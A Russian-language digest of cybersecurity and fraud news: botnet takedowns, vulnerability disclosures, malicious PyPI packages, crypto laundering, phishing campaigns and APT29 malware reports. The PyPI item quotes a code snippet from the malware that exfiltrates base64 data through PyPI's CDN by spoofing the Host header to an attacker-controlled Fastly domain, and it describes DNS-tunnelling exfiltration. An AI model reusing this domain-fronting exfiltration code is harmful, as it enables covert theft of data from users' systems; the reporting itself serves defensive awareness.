Сейчас нет законодательного регулирования между банками и операторами связи. Сами кредитные организации поддерживают создание платформы, в то время как операторы относятся к этой идее с осторожностью, поскольку опасаются потерять доходы, поступающие от банков за предоставление данных.
В МВД подтвердили «Коммерсанту», что участвуют в рабочей группе по созданию национальной платформы антифрода. Она будет представлять собой «централизованную систему противодействия операциям без согласия клиента на основе данных финансовых организаций и операторов связи». Представители Минцифры также подтвердили своё участие в обсуждении.
В ЦБ говорят, что по результатам работы над проектом было принято решение развивать обмен информацией между банками и операторами. Представители ведомства говорят, что платформу следует выстроить через действующие каналы взаимодействия, на базе инфраструктуры ФинЦЕРТ — подразделения ЦБ, на базе которого работает система информационного обмена между банками, силовыми ведомствами, операторами связи и компаниями в сфере информационной безопасности.
В МТС сообщили, что участвуют в обсуждении. В пресс-службе «МегаФона» заявили, что идея создания подобной антифрод-платформы обсуждалась ещё в 2023 году, но от неё было решено отказаться из-за высокой стоимости и неоднозначной эффективности. Представители оператора говорят, что ЦБ и банки решили «запустить пилотный проект информационного взаимодействия». В Tele2 говорят, что уже работают со всеми банками, которые хотят обмениваться данными по мошенническим звонкам, в «Вымпелкоме» лишь отметили, что сотрудничают с «некоторыми крупными банками».
Банки относятся к идее платформы с бóльшим энтузиазмом, пишет «Коммерсантъ». В ВТБ и Росбанке поддержали создание единой антифрод-платформы, вице-президент Ассоциации банков России Алексей Войлуков считает, что выстраивание подобной единой системы позволит кредитным организациям и операторам работать более эффективно. В «Тинькофф» заявили, что поддерживают любые взаимодействия банков и телекома.
Как программист превратил 3 000 устройств в многомиллионный бизнес.
ФБР ликвидировало ботнет IPStorm и его инфраструктуру после того, как в сентябре владелец IPStorm заключил сделку со следствием. Министерство юстиции США заявило о демонтаже инфраструктуры ботнета IPStorm, поразившим тысячи устройств на Linux, Mac и Android по всей Азии, Европе, Северной и Южной Америке.
Ботнет впервые был замечен исследователями в июне 2019 года, преимущественно нацеленный на системы Windows. Он привлек внимание специалистов использованием IPFS-протокола для коммуникации с зараженными системами и передачи команд. Отмечается, что количество зараженных систем выросло с около 3 000 в мае 2019 года до более 13 500 к 2020 году.
Минюст США сообщил, что владелец ботнета 18 сентября признал себя виновным по трем обвинениям в хакерстве, каждое из которых предусматривает максимальное наказание в 10 лет тюремного заключения. По данным Минюста, подсудимый разрабатывал и распространял вредоносное ПО с июня 2019 года по декабрь 2022 года, заражая тысячи подключенных к Интернету устройств по всему миру.
Основной целью ботнета было превращение зараженных устройств в прокси-серверы, доступ к которым предоставлялся через собственные веб-сайты владельца. За доступ к управлению зараженными устройствами клиенты платили сотни долларов в месяц. Сам преступник сообщил властям, что заработал от своей схемы не менее $550 000 и согласился передать всю заработанную криптовалюту, связанную с ботнетом. Минюст отключил инфраструктуру IPStorm, но не стал удалять вредоносное ПО с зараженных устройств — такое действие ФБР в предыдущих операциях демонтажа ботнетов вызывало споры.
Расследование проводило ФБР в Пуэрто-Рико, Доминиканской Республике и Испании совместно с местными правоохранительными органами. Также компании Anomali Threat Research и Bitdefender оказали помощь в раскрытии дела. Расследование стало еще одним примером успешного сотрудничества правоохранительных органов и частного сектора кибербезопасности в борьбе с незаконной деятельностью и привлечении виновных к ответственности.
source: justice[.]gov/usao-pr/pr/russian-and-moldovan-national-pleads-guilty- operating-illegal-botnet-proxy-service
Лия Роу (Leah Rowe), основной разработчик и основатель дистрибутива Libreboot, представила первый выпуск проекта Canoeboot, развиваемого параллельно с Libreboot и позиционируемого как полностью свободная сборка Libreboot, соответствующая [требованиям](https://www.gnu.org/distros/free-system-distribution- guidelines.html) Фонда СПО к полностью свободным дистрибутивам. Ранее проект был опубликован под именем "неофициальный GNU Boot", но после поступления претензии от создателей GNU Boot вначале был переименован в nonGeNUine Boot, а теперь в Canoeboot. Выпуск Canoeboot 20231026 основан на недавней версии Libreboot 20231021, из которой удалены компоненты и изменения, не соответствующие критериям Фонда СПО.
Необходимость в создании отдельной сборки Libreboot объясняется тем, что сформированные Фондом СПО требования к свободным дистрибутивам не допускают поставку бинарных прошивок (firmware) и любых бинарных компонентов драйверов. При этом начиная с прошлого года проект Libreboot перешёл на более прагматичные правила использования бинарных компонентов, позволившие заметно расширить спектр поддерживаемого аппаратного обеспечения. Новой целью проекта Libreboot стала поддержка всего оборудования, поддерживаемого в coreboot, за исключением бинарных компонентов, влияющих на безопасность и надёжность (например, в Libreboot используется me_cleaner для отключения Intel ME). При таком подходе Libreboot потерял статус полностью свободного дистрибутива с позиции Фонда Свободного ПО.
Устройства, поддерживаемые в Canoeboot (платы, которые поддерживаются в Libreboot, но не поддерживаются в Canoeboot зачёркнуты):
Серверные материнские платы:
Десктоп-системы:
Ноутбуки:
Основные изменения:
Осуществлён переход на находящуюся в разработке ветку загрузчика GRUB 2.12-rc. Добавлена поддержка шифрованных разделов в формате LUKS2, использующих механизм формирования ключа на базе алгоритма argon2 (ранее поддерживались только конфигурации с PBKDF2).
Упрощены команды сборочного инструментария lbmk (Libreboot build system), например, вместо "./build boot roms" теперь можно указывать "./build roms". Число сборочных скриптов сокращено с 50 до 12. Проведены два аудита сборочной системы lbmk, позволившие на 50% сократить размер кода и повысить производительность.
Проведена реструктуризация каталогов. Содержимое каталога "resources/scripts/" вынесено в отдельный каталог "script/", а каталог "resources/" переименован в "config/", так как там остались только файлы конфигурации и патчи (патчи планируют вынести в каталог "patch/"). Файлы IFD/GbE перенесены в каталог "config/ifd/". Специфичные для производителей бинарные файлы отделены от файлов IFD/GbE и размещены в каталоге "vendorfiles/".
Добавлена поддержка сборки serprog-прошивок для плат на базе микроконтроллеров RP2040 (pico-serprog) и STM32 (stm32-vserprog). Протокол serprog поддерживается в flashrom и применяется для прошивки SPI flash.
Загрузчик U-Boot, используемый в прошивках для Chromebook, обновлён до версии 2023.10.
Выполнена синхронизация с репозиторием Coreboot по состоянию на 12 октября, а с репозиторием SeaBIOS - по состоянию на 24 августа.
По сравнению с Libreboot удалена поддержка устройств:
Ресерчеры Palo Alto Networks в рамках Coordinated Vulnerability Disclosure (CVD) [раскрыли](https://unit42.paloaltonetworks.com/fabricscape- cve-2022-30137/) подробности о новой уязвимости, затрагивающей кластеры Service Fabric (SF) Linux ([CVE-2022-30137](https://msrc.microsoft.com/update- guide/vulnerability/CVE-2022-30137)) и получившей наименование FabricScape.
По данным Microsoft, Service Fabric ежедневно размещает более 1 миллиона приложений и запускает миллионы ядер, поддерживая многие продукты Azure, включая Azure Service Fabric, SQL Azure и Azure CosmosDB, а также решения Microsoft, включая Cortana и Microsoft Power BI.
Кластер Service Fabric представляет собой подключенный к сети набор из нескольких узлов (Windows Server или Linux), каждый из которых предназначен для управления и выполнения приложений, состоящих из микрослужб или контейнеров. Уязвимость, обнаруженная Unit 42, находится в компоненте под названием Diagnostics Collection Agent (DCA).
FabricScape позволяет злоумышленнику, имеющему доступ к скомпрометированному контейнеру, повысить привилегии и получить контроль над SF-узлом узла ресурса и всем кластером. Уязвимость может быть использована в контейнерах с настроенным runtime access, который по умолчанию предоставляется каждому контейнеру.
В гипотетическом сценарии атаки злоумышленник, имеющий доступ к скомпрометированной контейнерной рабочей нагрузке, может заменить считываемый агентом файл ProcessContainerLog.txt мошеннической ссылкой, которая затем может быть использована для перезаписи любого произвольного файла, ведь DCA работает от имени пользователя root на узле.
Проблема затрагивает обе платформы операционных систем (ОС), но эксплуатировать ее в ходе атак можно только в Linux. В контейнерах Windows непривилегированные участники не могут создавать символические ссылки в этой среде.
Microsoft полностью [решила](https://msrc-blog.microsoft.com/2022/06/28/azure- service-fabric-privilege-escalation-from-containerized-workloads-on-linux/) проблему 14 июня 2022 г., выпустив исправление для Azure Service Fabric, которое еще в конце мая было применено ко всем клиентам с автоматическим обновлением.
Хотя на сегодняшний день нет доказательств того, что эта уязвимость использовалась в реальных атаках, тем не менее клиентам, использующим Azure Service Fabric без автоматического обновления, следует обновить свои кластеры Linux до самого последнего выпуска [Service Fabric 9.0 1.0](https://github.com/microsoft/service- fabric/blob/master/release_notes/Service_Fabric_ReleaseNotes_90CU1.md).
В каталоге PyPI (Python Package Index) выявлено 11 пакетов, включающих вредоносный код. До выявления проблем в сумме пакеты успели загрузить около 38 тысяч раз. Выявленные вредоносные пакеты примечательны применением замысловатых способов скрытия каналов связи с серверами злоумышленников.
importantpackage (6305 загрузок), important-package (12897) - устанавливали соединение с внешним сервером под видом подключения к pypi.python.org для предоставления shell-доступа к системе (reverse shell) и использовали для скрытия канала связи программу trevorc2.
pptest (10001), ipboards (946) - использовали DNS в качестве канала связи для передачи сведений о системе (в первом пакете имя хоста, рабочий каталог, внутренний и внешний IP, в во втором - имя пользователя и хоста).
owlmoon (3285), DiscordSafety (557), yiffparty (1859) - выявляли в системе токен сервиса Discord и отправляли на внешний хост.
trrfab (287) - отправлял на внешний хост идентификатор, имя хоста и содержимое /etc/passwd, /etc/hosts, /home.
10Cent10 (490) - устанавливал обратное shell-соединение с внешним хостом.
yandex-yt (4183) - выводил сообщение о компрометации системы и перенаправлял на страницу с дополнительной информацией о дальнейших действиях, выдаваемой через nda.ya.ru (api.ya.cc).
Отдельного внимания заслуживает метод обращения к внешним хостам, используемый в пакетах importantpackage и important-package, которые использовали для скрытия своей активности сеть доставки контента Fastly, применяемую в каталоге PyPI. Фактически запросы отправлялись на сервер pypi.python.org (в том числе, указывая имя python.org в SNI внутри запроса HTTPS), но при этом в HTTP- заголовок "Host" выставлялось имя сервера, подконтрольного атакующим (sec.forward.io.global.prod.fastly.net). Сеть доставки контента направляла подобный запрос на сервер атакующих, используя при передаче данных параметры TLS-соединения с pypi.python.org.
Работа инфраструктуры PyPI обеспечивается с привлечением сети доставки контента Fastly, в которой для кэширования типовых запросов используется прозрачный прокси Varnish, а также применяется обработка TLS-сертификатов на уровне CDN, а не конечных серверов, для организации проброса HTTPS-запросов через прокси. Независимо от целевого хоста запросы направляются в прокси, который определяет нужный хост по HTTP-заголовку "Host", а доменные имена хостов привязываются к типовым для всех клиентов Fastly IP-адресам балансировщиков нагрузки CDN.
Сервер атакующих также регистрируется в CDN Fastly, который предоставляет всем желающим бесплатные тарифные планы и даже допускает анонимную регистрацию. Примечательно, что для отправки запросов жертве при создании "reverse shell" используется также схема, но инициируемая со стороны хоста злоумышленников. Со стороны взаимодействие с сервером атакующих выглядит как легитимный сеанс с каталогом PyPI, шифруемый с использованием TLS-сертификата PyPI. Подобная техника, известная под именем "domain fronting", ранее активно использовалась для скрытия имени хоста при обходе блокировок, используя предоставляемую в некоторых CDN-сетях возможность обращения по HTTPS с указанием в SNI фиктивного хоста и фактической передачей имени запрашиваемого хоста в HTTP- заголовке Host внутри TLS-сеанса.
Для скрытия вредоносной активности дополнительно применялся пакет TrevorC2, позволяющий сделать взаимодействие с сервером похожим на обычную web- навигацию, например, вредоносные запросы отправлялись под видом загрузки изображения "https://pypi.python.org/images/guid=" с кодированием информации в параметре guid.
Code:Copy to clipboard
url = "https://pypi.python.org" + "/images" + "?" + "guid=" + b64_payload
r = request.Request(url, headers = {'Host': "psec.forward.io.global.prod.fastly.net"})
В пакетах pptest и ipboards применялся другой подход для скрытия сетевой активности, основанный на кодировании полезной информации в запросах к DNS- серверу. Вредоносное ПО передаёт информацию, выполняя DNS-запросы вида "nu4timjagq4fimbuhe.example.com", в которых при помощи формата base64 в имени поддомена закодированы передаваемые на управляющий сервер данные. Злоумышленник принимает данные сообщения, контролируя DNS-сервер для домена example.com.
• Source: <https://jfrog.com/blog/python-malware-imitates-signed-pypi-traffic- in-novel-exfiltration-technique/>
К ней может иметь отношение живущая в Чехии украинка
Представители российского киберкрайма используют для отмывания денег канадскую компанию со сложной структурой. К такому выводу, как сообщает ИБ-журналист Брайан Кребс, пришел блокчейн-аналитик и расследователь Ричард Сандерс, который провел большую часть прошлого года на Украине, исследуя меняющийся ландшафт российских криптобирж.
Всего в его материале упоминаются 122 сервиса. Часть из них — пуленепробиваемые хостинг-провайдеры, другие — продают различные учетные записи, третьи — смс-сервисы. Все они обрабатывают свои транзакции через компанию Cryptomus, базирующуюся в канадском Ванкувере. Собранные Сандерсом данные указывают на то, что еще 56 криптовалютных бирж используют Cryptomus. Среди них такие сервисы как casher[.]su, grumbot[.]com, flymoney[.]biz, obama[.]ru и swop[.]is. Все они ориентированы на пользователей из России.
В небольшом трехэтажном здании, в котором официально зарегистрирована Cryptomus, по документам числятся еще 76 валютных дилеров, шесть бирж и восемь компаний, предоставляющих финансовые услуги. Однако по факту там расположен массажный салон и коворкинг, никогда не предоставлявший никаких услуг упомянутым выше организациям.
«Мы видим, что киберпреступники-вымогатели, наркоторговцы, мошенники, владельцы даркнет-площадок и находящиеся под санкциями организации заводят деньги в Cryptomus, чтобы совершать там покупки, а также отмывают их, используя платежный API», — говорится в заявлении исследователей из компании Chainanlysis.
Материнской для Cryptomus указана компания Xeltox Enterprises, ранее носившая название Certa Payments. Фирма с таким же названием была зарегистрирована в Лондоне в декабре 2023 года. Ее единственный акционером и директором оказалась 25-летняя украинка из Чехии по имени Вира Кричка. Также недавно она была назначена главой нескольких других новых британских фирм, некоторые из которых вложены друг в друга и также занимаются платежами.
krebsonsecurity[.]com/2024/12/how-cryptocurrency-turns-to-cash-in-russian- banks
Трое граждан Нигерии нашли способ обмана властей США: на протяжении года они получали коронавирусные пособия по безработице. Схема реализовывалась на протяжении года (с июня 2020-го по июль 2021-го). За это время ими было направлено около 200 заявлений, причем все они были от имени лиц, которые также не имели права на получение помощи от государства.
Заявки содержали ложные сведения, в том числе, например, о том, что заявители работали на определенных работодателей, имели конкретный годовой доход, были самозанятыми, но затем остались без работы либо были уволены с постоянных мест. При этом сами члены группировки нигде никогда официально не числились и не планировали вступать на путь легальных заработков.
Зато на 68 банковских карточек, которыми владели двое из трех членов группировки, от государства поступил без малого миллион долларов. В итоге один из них был приговорен к 26 месяцам заключения, а другой — к 14. Дело третьего соучастника рассматривалось раньше — летом 2023 года он получил четыре года и девять месяцев тюрьмы.
Несмотря на то, что группировка смогла оставаться безнаказанной и незамеченной на протяжении года, говорить, что ее члены отличались умом и сообразительностью, не следует. Абсолютно все 200 заявок, которые поступили от имен разных людей, содержали один и тот же адрес заявителя. И находился по этому адресу реальный дом, в котором втроем жили члены группировки.
Женщина выдавала себя за смертельно больную пациентку, чтобы выманить помощь.
Элинор Асраф, ранее судимая профессиональная мошенница, обманула правоохранительные органы и избежала судебного преследования, симулируя свою смертельную болезнь.
Об этом сообщает "[12 канал](https://www.mako.co.il/news- israel/2023_q3/Article-12586494347da81027.htm?sCh=31750a2610f26110&pId=173113802)".
Так, против Асраф ранее велось ряд уголовных расследований - женщина использовала несколько фальшивых удостоверений личности с разными именами, чтобы мошеннически выманить большие суммы денег у различных лиц. Затем, Асраф предоставила видео и медицинские документы, утверждая, что у нее последняя стадия рака.
2 Она представила эти документы полиции, судам и Службе национального страхования («Битуах леуми»), в результате чего преследование было приостановлено. Органы примушили ее версии, полагая, что ей осталось немного времени, и решив не беспокоить "умирающую", - указано в сообщении.
Однако недавно следователи из «Битуах леуми» обнаружили, что Асраф на самом деле жива и здорова. Она изменила свое имя на Тоар Диамант и преуспела в мошенничестве. Так, Асраф украла личные данные другой женщины, которая действительно страдает от смертельной болезни, и каким-то образом добавила их в компьютерные системы под своим именем. За это время ей удалось получить около 500 тысяч шекелей от «Битуах леуми» под различными предлогами.
Один из семейных врачей Асраф попытался осмотреть ее, но ему было отказано. Затем Диамант предоставила видео, на котором она изображалась как женщина на терминальной стадии болезни, с кислородными трубками и системой поддержки жизни. Однако она выглядела ухоженной, с совершенным макияжем и увеличенными губами благодаря ботоксу. Таким образом, мошенницу удалось разоблачить.
Сама Тоар Диамант настаивает на своей невиновности. В свете новых обстоятельств можно ожидать, что судебное преследование против нее возобновится.
В марте 2022 года американец Дэвид Зайас ехал по шоссе в городе Скарсдейл,
штат Нью-Йорк. Его машина, серый Chevrolet, была совершенно ничем не
примечательна, как и её скорость. Но для полицейского управления округа
Вестчестер автомобиль был причиной беспокойства, а Зайас — потенциальным
преступником.
Дело в том, что новый мощный инструмент на основе искусственного интеллекта определил поведение автомобиля как подозрительное. Просматривая базу данных из свыше полутора миллиарда записей номерных знаков, собранных за последние два года по всему штату Нью-Йорк, ИИ определил, что автомобиль Зайаса совершал поездку, типичную для наркоторговца.
Согласно заявлению прокуратуры Министерства юстиции, в период с октября 2020 по август 2021 года мужчина совершил девять поездок из Массачусетса в разные части Нью-Йорка, следуя маршрутам, которые, как известно, используются наркоторговцами.
10 марта прошлого года полиция Вестчестера остановила Зайаса и обыскала его машину, обнаружив внутри 112 граммов крэка, полуавтоматический пистолет и 34 тысячи долларов наличными. Год спустя Зайас признал себя виновным по обвинению в незаконном обороте наркотиков.
Полиция уже давно использует систему автоматического распознавания номерных знаков (ALPR), однако ранее она применялась только для поиска конкретных автомобилей, связанных с конкретными преступлениями. В вышеописанным же случае система анализировала передвижение вообще всех автомобилей, проезжающих мимо любой из 480 камер округа, а эти данные «скармливались» искусственному интеллекту.
Как сообщается, система слежения за номерными знаками полиции Вестчестера была создана частной компанией Rekor, которая специализируется на искусственном интеллекте. Данные государственных органов показывают, что Rekor продала свою технологию ALPR уже по меньшей мере 23 полицейским управлениям и местным органам власти по всей Америке. Это, не считая более чем 40 полицейских управлений по всему штату Нью-Йорк, которые могут пользоваться системой полиции округа Вестчестер.
Сейчас, когда так много агентств собирают записи номерных знаков, да ещё и используют их в паре с технологиями искусственного интеллекта, правозащитники бьют тревогу: в их глазах подобные технологии нарушают базовые права среднестатистических американцев, грубым образом нарушая их конфиденциальность.
«Без судебного надзора этот тип системы работает по прихоти каждого офицера, имеющего к ней доступ», — заявил Бен Голд, адвокат вышеупомянутого Дэвида Зайаса.
«Масштабы такого рода слежки просто невероятно велики», — выразил свои опасения Бретт Макс Кауфман, старший юрист американского союза защиты гражданских свобод.
В погоне за этой неуловимой прибылью рынок «ИИ-шпионажа» смотрит не только на правоохранительные органы, но и на розничную торговлю и фаст-фуд.Так, McDonald's и White Castle уже начали использовать технологии, подобные ALPR, для оптимизации доставок, выявления возвращающихся клиентов и использования опыта прошлых заказов конкретных клиентов для гибких персональных рекомендаций.
С ростом масштабов распространения подобных умных систем становится всё труднее избежать бдительного наблюдения со стороны правительства и корпораций. Будем надеяться, что американская практика не будет со временем внедрена повсеместно, иначе уже совсем скоро мы сможем лицезреть сюжеты многочисленных фильмов-антиутопий в реальной жизни.
JFrog раскрыли подробности нескольких уязвимостей, влияющих на протокол OPC
UA, в том числе баги, которые были представлены на Pwn2Own Miami 2022 в начале
этого года.
OPC UA (Open Platform Communications United Architecture) представляет собой
протокол связи между машинами, который используется многими поставщиками
промышленных решений для обеспечения взаимодействия между различными типами
промышленных систем управления ICS.
Исследователи JFrog обнаружили несколько уязвимостей в OPC UA и раскрыли некоторые из них на апрельском конкурсе, заработав в общей сложности 10 000 долларов за взлом АСУ ТП.
В категории серверов OPC UA на Pwn2Own они продемонстрировали два эксплойта отказа в обслуживании (DoS), нацеленные на сервер OPC UA .NET Standard, сервер с открытым исходным кодом, используемый сотнями других репозиториев на GitHub, и демонстрационный сервер Unified Automation OPC UA C++.
Обе уязвимости могут быть использованы для вызова DoS сервера OPC UA, что на практике может оказать крайне негативное влияние на АСУ ТП и привести к нарушению критических процессов.
Кроме того, исследователи JFrog сообщили о восьми других уязвимостях в Unified Automation. Проблемы были обнаружены в SDK OPC UA Server на основе Unified Automation C++ и устранены в версии 1.7.7 SDK.
При этом две из них могут позволить злоумышленнику с повышенными привилегиями добиться RCE на сервере.
В виду ограничений по времени и стабильности, ошибки не эксплуатировались в рамках Pwn2Own, однако технические одробности все же были изложены JFrog в отдельной категории своего блога.
Несмотря на то, что RCE-эксплойты нестабильны, исследователи все же полагают, что их можно доработать и применять в дикой природе.
В целом, технические особенности, раскрытых JFrog уязвимостей, имеют важную практическую ценность, открывая путь для дальнейшего изучения вопросов безопасности промышленного стека OPC UA.
Source: <https://jfrog.com/blog/crashing-industrial-control-systems-at- pwn2own-miami-2022>
Мошенникам тоже нужна конфиденциальность для отмывания средств
По словам исследователей Chainalysis , количество криптовалют в миксерах, повышающих конфиденциальность, достигло рекордно высокого уровня в этом году. Это связано с тем, что преступная деятельность практически удвоилась.
Криптовалюта, получаемая миксерами, значительно колеблется ежедневно. За 30 дней скользящая средняя средств из миксеров в середине апреля достигла $51,8 млн., что является историческим максимумом. Это почти в 2 раза превышает объемы поступающих в миксеры в 2021 году. Более того, в 2022 году на незаконные адреса кошельков тумблеры отправили 23% средств, по сравнению с 12% процентами в 2021 году.
Согласно исследованию, всплеск вызван санкционными организациями России и Северной Кореи, а также мошенниками, занимающимися криптовалютными инвестициями. На увеличение спроса также повлияло мошенничество с криптовалютой и кражей средств, осуществляемые группами, находящимися под санкциями правительства США.
Попавшие под санкции организации возглавляет российский даркнет-маркет Hydra . В апреле Минфин США наложило на Hydra санкции, чтобы помешать отмыванию незаконно заработанных денег. Следом за Hydra идут северокорейская хакерская группа Lazarus и миксер Blender.io, который предположительно использовался северокорейскими хакерами для отмывания средств.
Миксер (тумблер) запутывает криптовалютные транзакции, создавая разрыв между средствами, которые пользователь вносит, и средствами, которые пользователь выводит. Для этого миксер объединяет средства, внесенные большим количеством пользователей, и случайным образом смешивает их. Каждый пользователь может вывести всю внесенную сумму за вычетом комиссии тумблера, но поскольку монеты поступают из этого беспорядочного пула, правоохранительным органам сложно отследить, куда ушли деньги.
«Миксеры в настоящее время популярны для отмывания денег: в миксеры направляются 25% средств, поступающих с мошеннических кошельков, связанных с враждебными государствами», — сказали эксперты.
Однако, миксеры работают менее эффективно, когда люди используют их для внесения больших сумм. «В миксере пользователи получают «смесь» общих средств. Если один пользователь заполняет миксер и вносит больше других, остальные пользователи получат, в основном, те средства, которые они изначально вложили, что делает возможным отслеживание перемещения средств до первоначального источника.
Другими словами, миксеры работают лучше всего, когда у них большое количество пользователей, каждый из которых смешивает сопоставимые суммы криптовалюты», — поясняется в отчете специалистов.
source: blog.chainalysis.com/reports/cryptocurrency-mixers/
Незаконным бизнесом занимались не одиночки, а целые группировки
злоумышленников.
Группа по анализу угроз Google отчиталась о блокировке доменов, связанных с
действиями группировок по заказному взлому учетных записей пользователей,
сообщает « Коммерсант ».
Как отмечается, в том числе были заблокированы десять доменов, используемых для фишинга в отношении пользователей из России и соседних с ней стран.
Google связывает домены с группировкой, которой компания Trend Micro в ноябре 2021 года присвоила имя Void Balaur.
Специалисты Google обратили внимание на фишинговую кампанию злоумышленников в 2017 году, когда их деятельность была направлена против некоего «российского журналиста, занимающегося вопросами борьбы с коррупцией». О ком именно идёт речь в сообщении не уточняется. Позднее специалисты выяснили, что хакеры атаковали и других журналистов, политиков, а также неправительственные и некоммерческие организации, не только в России, но и по всей Европе.
Злоумышленники рассылали по почте ссылки на страницы, выглядящие как окно входа в почту на Gmail, Mail.ru и другие сервисы. Подобные письма приходили пользователям якобы с территории Украины, Болгарии и Латвии.
Кроме того, киберпреступники создавали подставные страницы входа в российские государственные сервисы.
Российская криптовалютная торговая площадка Latoken сообщила о хакерской атаке. Некий «недовольный сотрудник» разместил в корпоративном Твиттере сообщения, порочащие репутацию проекта.
Неизвестный злоумышленник взломал аккаунт криптобиржи Latoken и опубликовал в Twitter объявление, что биржа является мошенническим проектом:
Внимание — это обменник создан мошенниками. Они продвигают мошеннические IEO, обещая рост от 100% до 500%. Они обманывают и лгут учредителям и сотрудникам. Они вводят в заблуждение инвесторов, которые думают, что проведут успешные IEO. Хотя этого никогда не произойдет».
Аватар учетной записи был изменен на сообщение о мошенниках, а описание аккаунта отредактировано на «LATOKEN — ведущая платформа SCAM!» Появилась запись о том, что биржа несправедливо относится к персоналу и увольняет сотрудников без причины. И запись с обвинениями основателя Latoken Валентина Преображенского в обмане.
Кроме Твиттера Latoken, был скомпрометирован официальный Твиттер ladex и проекта DEX. Хакер опубликовал видео онлайн-встречи, на которой человек, похожий на гендиректора Latoken, выкрикивает кому-то проклятия.
Компрометируя биржу, хакер поставил обзору Trust Pilot на Latoken две звезды из пяти возможных. У Trust Pilot в ответ появилось предупреждение о поддельных отзывах на странице Latoken.
Вскоре официальный аккаунт Latoken в Telegram опубликовал сообщение о взломе. Биржа заявила, что считает произошедшее действиями «недовольного сотрудника». Команда связалась со службой поддержки Twitter, чтобы вернуть контроль над аккаунтом.
Подобный инцидент — не самое худшее, что может сделать обиженный администрацией криптокомпании сотрудник. В 2020 году недовольный работник FCoin уничтожил принадлежавшие платформе и команде токены биржи на $75 млн. Впрочем, нередки случаи, когда проект на самом деле оказывается мошенническим. Например, основатель платформы AfriCrypt в августе 2021 года скрылся с 69 000 BTC пользователей.
Фигурант входил в группу злоумышленников, которые на площадках объявлений продавали несуществующие машины. Таким образом группировка присвоила около 1,5 миллиона гривен.
25-летний житель Сумской области совместно с тремя знакомыми обманул граждан на площадках объявлений. Правонарушители продавали несуществующие автомобили при условии частичной подписки. Общая сумма убытков достигает 1,5 миллиона гривен.
Злоумышленника, который скрывался от следствия и суда, задержали сотрудники управления противодействия киберпреступлениям Киева совместно со следователями Соломенского управления полиции в порядке ст. 208 Уголовного процессуального кодекса Украины.
По месту его жительства полицейские провели обыск совместно с работниками роты полиции особого назначения Сумской области.
Фигуранту объявлено о подозрении в совершении правонарушения, предусмотренного ч. 4 ст. 190 (Мошенничество) Уголовного кодекса Украины. Санкция статьи предусматривает до 12 лет лишения свободы. Подозреваемому избрана мера пресечения - содержание под стражей с правом внесения залога.
Сейчас обвинительные акты в отношении участников мошеннической группировки направлены в суд.
Наблюдатели из Mandiant обнаружили новый кастомный инструмент в арсенале APT29 (в Microsoft эту APT-группу называют Nobelium). Загрузчик Ceeloader избирательно устанавливается на Windows-машины после проникновения в сеть и обеспечивает скрытное исполнение вредоносного шелл-кода.
Кибергруппировка Nobelium, она же APT29, The Dukes и Cozy Bear, известна прежде всего громкой атакой на SolarWinds, затронувшей множество организаций по всему миру. За рубежом этим хорошо обеспеченным хакерам склонны приписывать российские корни.
Целью атак APT-группы является шпионаж; ее интересуют секреты правительственных учреждений, военных организаций, НКО, НИИ, ИТ-компаний, телеком-провайдеров. В своих вылазках Nobelium часто использует легитимные инструменты Windows, но всегда делает ставку на собственные разработки. Так, в атаке на SolarWinds засветился целый ряд новых кастомных зловредов — бэкдор Sunburst, обеспечивающий его установку Sunspot, бэкдоры GoldMax, Sibot и GoldFinder.
Теперь этот арсенал, по данным Mandiant, пополнился специализированным загрузчиком. Написанный на C вредонос Ceeloader примечателен тем, что поддерживает исполнение шелл-кода в памяти.
Код самого зловреда сильно обфусцирован: он щедро замусорен и часто без цели вызывает Windows API. Нужные вызовы при этом скрываются с помощью функции- обертки, которая расшифровывает имя API и динамически разрешает его перед вызовом.
Для коммуникаций Ceeloader использует HTTP, а ответы с C2-сервера расшифровывает, используя AES-256 в режиме CBC. Запрос HTTP содержит статически определенный ID (в сэмплах может варьироваться).
Установку Ceeloader осуществляет развернутый в сети Cobalt Strike Beacon; в зараженной системе создается плановое задание на запуск при каждом входе уровня SYSTEM. Специального механизма для обеспечения постоянного присутствия в системе у нового загрузчика нет. Целевую полезную нагрузку он скачивает из внешнего источника — эксперты выявили два таких WordPress-сайта, по всей видимости, скомпрометированных.
• Source: https://www.mandiant.com/resources/russian-targeting-gov-business
В выпущенном несколько часов назад обновлении протокола DeFi Compound Finance была обнаружена ошибка, из-за которой пользователи получили лишние награды на $80 млн.
В обновлении было принято предложение, которое меняет распределение наград в токенах COMP между поставщиками ликвидности и пользователями. Если раньше распределение было в пропорции 50/50, то теперь расчет проводится по соотношению объемов кредитов и ликвидности.
Ошибка в контракте Comptroller привела к тому, что некоторые пользователи смогли получать чрезмерные награды. Пользователи уже перевели на свои кошельки лишних токенов COMP на $50 млн.
«Была зафиксирована необычная активность при распределении COMP после активации обновления. Средства пользователей в безопасности, наша команда исследует несоответствия в распределении токенов», – говорится в сообщении Compound Finance.
Как впоследствии сообщил Роберт Лешнер (Robert Leshner), основатель разработавшей протокол компании Compound Labs, под угрозой оказались 280 000 токенов COMP на общую сумму $80 млн. При этом у команды нет способа помешать дальнейшему распределению токенов:
«Нет прав администратора или других инструментов для отключения распределения токенов COMP. Любые изменения в протоколе должны пройти семидневный процесс одобрения, чтобы быть активированными».
Напомним, что Compound Finance является одним из крупнейших протоколов кредитования. Сейчас в проекте заблокировано активов на $9.97 млрд. В ноябре прошлого года в протоколе были ликвидированы позиции пользователей на $89 млн из-за сбоя ценового оракула Coinbase для токена DAI.
Эксперты Microsoft изучили новый инструмент постэксплуатации, который APT- группа Nobelium уже пустила в ход. Бэкдор, получивший кодовое имя FoggyWeb, позволяет взломщикам получить данные о настройках службы федерации Active Directory (ADFS), сертификаты для подписи и расшифровки токенов SAML, а также загрузить на сервер дополнительные компоненты.
Преступная группировка, которую в Microsoft называют Nobelium, известна и под другими именами — APT29, The Dukes, Cozy Bear. Эти хакеры часто обновляют свой арсенал и проводят сложные атаки на госструктуры, НКО, научно- исследовательские учреждения, поставщиков ИТ- и телеком-услуг. Им также приписывают авторство прошлогоднего нападения на SolarWinds, получившего большой резонанс.
Первые атаки с использованием FoggyWeb, по данным Microsoft, были зафиксированы в минувшем апреле. Хакеры устанавливают этого работающего в памяти зловреда на взломанный сервер ADFS, чтобы обеспечить себе плацдарм для развития атаки.
Получив админ-доступ к системе, злоумышленники вносят в нее два файла — зашифрованный Windows.Data.TimeZones.zh-PH.pri (FoggyWeb) и version.dll (загрузчик). Вредоносная библиотека загружается в память процесса ADFS по методу подмены DLL; этот компонент отвечает за расшифровку и запуск основного модуля бэкдора.
Активированный FoggyWeb мониторит входящие HTTP-запросы GET и POST, фиксируя используемые схемы URI — список нужных жестко прописан в его коде. Обнаружив совпадение, зловред перехватывает послание и выполняет содержащуюся в нем команду.
